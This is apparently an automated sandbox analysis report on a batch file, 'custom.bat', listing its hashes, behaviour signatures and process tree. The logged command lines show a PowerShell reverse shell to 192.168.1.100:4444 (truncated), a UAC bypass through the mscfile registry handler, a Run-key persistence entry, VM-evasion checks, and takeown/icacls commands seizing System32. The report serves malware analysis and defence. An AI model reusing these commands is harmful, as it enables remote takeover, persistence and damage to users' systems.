Analysis
- max time kernel: 139s
- max time network: 142s
- platform: windows11-21h2_x64
- resource: win11-20240802-en
- resource tags: arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 08/09/2024, 06:47
Static task: static1
Behavioral task: behavioral1 (sample custom.bat, resource win10-20240404-en)
Behavioral task: behavioral2 (sample custom.bat, resource win7-20240903-en)
Behavioral task: behavioral3 (sample custom.bat, resource win10v2004-20240802-en)
Behavioral task: behavioral4 (sample custom.bat, resource win11-20240802-en)
General
- Target: custom.bat
- Size: 4KB
- MD5: 1c63745d54962d205bb3ae879bea1ed4
- SHA1: a832c894a4e2b6d486c48b9ea6ec79d94df9537e
- SHA256: 396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e
- SHA512: 129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39
- SSDEEP: 96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix
Malware Config
Signatures
- Possible privilege escalation attempt (4 IoCs)
  pid 3100 takeown.exe; pid 4520 takeown.exe; pid 1196 icacls.exe; pid 3596 icacls.exe
- Modifies file permissions (1 TTP, 4 IoCs)
  pid 1196 icacls.exe; pid 3596 icacls.exe; pid 3100 takeown.exe; pid 4520 takeown.exe
- Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str): \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Software\Microsoft\Windows\CurrentVersion\Run\TotalDestruction = "C:\\Users\\Admin\\AppData\\Local\\Temp\\custom.bat" (reg.exe)
- Command and Scripting Interpreter: PowerShell
  pid 4840 powershell.exe; pid 2304 powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Delays execution with timeout.exe (2 IoCs)
  pid 728 timeout.exe; pid 2860 timeout.exe
- Gathers system information (1 TTP, 3 IoCs)
  Runs systeminfo.exe.
  pid 920 systeminfo.exe; pid 4796 systeminfo.exe; pid 2912 systeminfo.exe
- Modifies registry class (10 IoCs)
  Key deleted      \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile (reg.exe)
  Key created      \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open (reg.exe)
  Key deleted      \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open\command (reg.exe)
  Key deleted      \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open (reg.exe)
  Set value (str)  \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\full_destruction.bat" (reg.exe)
  Key created      \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\Local Settings (cmd.exe)
  Key deleted      \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell (reg.exe)
  Key created      \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell\open\command (reg.exe)
  Key created      \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile (reg.exe)
  Key created      \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\mscfile\shell (reg.exe)
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid 4840 powershell.exe; pid 4840 powershell.exe; pid 2304 powershell.exe; pid 2304 powershell.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeDebugPrivilege          pid 4840 powershell.exe
  Token: SeTakeOwnershipPrivilege  pid 3100 takeown.exe
  Token: SeDebugPrivilege          pid 2304 powershell.exe
  Token: SeTakeOwnershipPrivilege  pid 4520 takeown.exe
- Suspicious use of WriteProcessMemory (34 IoCs)
  description                        pid   Process  procid_target
  PID 1876 wrote to memory of 3236   1876  cmd.exe  79
  PID 1876 wrote to memory of 3236   1876  cmd.exe  79
  PID 1876 wrote to memory of 4840   1876  cmd.exe  80
  PID 1876 wrote to memory of 4840   1876  cmd.exe  80
  PID 1876 wrote to memory of 728    1876  cmd.exe  81
  PID 1876 wrote to memory of 728    1876  cmd.exe  81
  PID 1876 wrote to memory of 2740   1876  cmd.exe  82
  PID 1876 wrote to memory of 2740   1876  cmd.exe  82
  PID 1876 wrote to memory of 624    1876  cmd.exe  83
  PID 1876 wrote to memory of 624    1876  cmd.exe  83
  PID 1876 wrote to memory of 2860   1876  cmd.exe  87
  PID 1876 wrote to memory of 2860   1876  cmd.exe  87
  PID 624 wrote to memory of 3100    624   cmd.exe  88
  PID 624 wrote to memory of 3100    624   cmd.exe  88
  PID 1876 wrote to memory of 3196   1876  cmd.exe  89
  PID 1876 wrote to memory of 3196   1876  cmd.exe  89
  PID 1876 wrote to memory of 4796   1876  cmd.exe  90
  PID 1876 wrote to memory of 4796   1876  cmd.exe  90
  PID 1876 wrote to memory of 2184   1876  cmd.exe  91
  PID 1876 wrote to memory of 2184   1876  cmd.exe  91
  PID 1876 wrote to memory of 2912   1876  cmd.exe  94
  PID 1876 wrote to memory of 2912   1876  cmd.exe  94
  PID 1876 wrote to memory of 1016   1876  cmd.exe  95
  PID 1876 wrote to memory of 1016   1876  cmd.exe  95
  PID 1876 wrote to memory of 920    1876  cmd.exe  96
  PID 1876 wrote to memory of 920    1876  cmd.exe  96
  PID 1876 wrote to memory of 1160   1876  cmd.exe  97
  PID 1876 wrote to memory of 1160   1876  cmd.exe  97
  PID 1876 wrote to memory of 2304   1876  cmd.exe  98
  PID 1876 wrote to memory of 2304   1876  cmd.exe  98
  PID 1876 wrote to memory of 4948   1876  cmd.exe  99
  PID 1876 wrote to memory of 4948   1876  cmd.exe  99
  PID 1876 wrote to memory of 4520   1876  cmd.exe  100
  PID 1876 wrote to memory of 4520   1876  cmd.exe  100
Processes
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
  PID: 1876
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\mode.com
    mode con: cols=800 lines=60
    PID: 3236
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
    PID: 4840
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\timeout.exe
    timeout /t 5
    PID: 728
    - Delays execution with timeout.exe
  - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f
    PID: 2740
    - Modifies registry class
  - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "
    PID: 624
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\* /r /d y
      PID: 3100
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\* /grant Admin:F /t /c
      PID: 1196
      - Possible privilege escalation attempt
      - Modifies file permissions
  - C:\Windows\system32\timeout.exe
    timeout /t 5
    PID: 2860
    - Delays execution with timeout.exe
  - C:\Windows\system32\reg.exe
    reg delete "HKCU\Software\Classes\mscfile" /f
    PID: 3196
    - Modifies registry class
  - C:\Windows\system32\systeminfo.exe
    systeminfo
    PID: 4796
    - Gathers system information
  - C:\Windows\system32\findstr.exe
    findstr /i "VirtualBox"
    PID: 2184
  - C:\Windows\system32\systeminfo.exe
    systeminfo
    PID: 2912
    - Gathers system information
  - C:\Windows\system32\findstr.exe
    findstr /i "VMware"
    PID: 1016
  - C:\Windows\system32\systeminfo.exe
    systeminfo
    PID: 920
    - Gathers system information
  - C:\Windows\system32\findstr.exe
    findstr /i "Hyper-V"
    PID: 1160
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()" (command line truncated in the middle as shown on the page)
    PID: 2304
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
    PID: 4948
    - Adds Run key to start application
  - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\* /r /d y
    PID: 4520
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\* /grant Admin:F /t /c
    PID: 3596
    - Possible privilege escalation attempt
    - Modifies file permissions
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
  MD5: 5f4c933102a824f41e258078e34165a7
  SHA1: d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
  SHA256: d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
  SHA512: a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
- Filesize: 1KB
  MD5: d405540758f0f5bdaab94f1a054cc67d
  SHA1: 07e307420a26d17c2dc1226af6e72018da4ae26c
  SHA256: 2ad4d5239f9647362dc68a96eae37de27bdd40359126715c72d79770d3d75d61
  SHA512: 59496f3ae411c3eda1f20335249fa6635cba06974f07b16a181271708a0d5dd078f50ef349e98e4b53643588eb77f4c56c8e2c7fb51a5c638273009ed1b7b889
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 285B
  MD5: 4577f08330df24a350ff523ec87bf38e
  SHA1: 5bd1a1b1b8ca3b007102a75f7abaf72348955cf2
  SHA256: 5ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae
  SHA512: ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2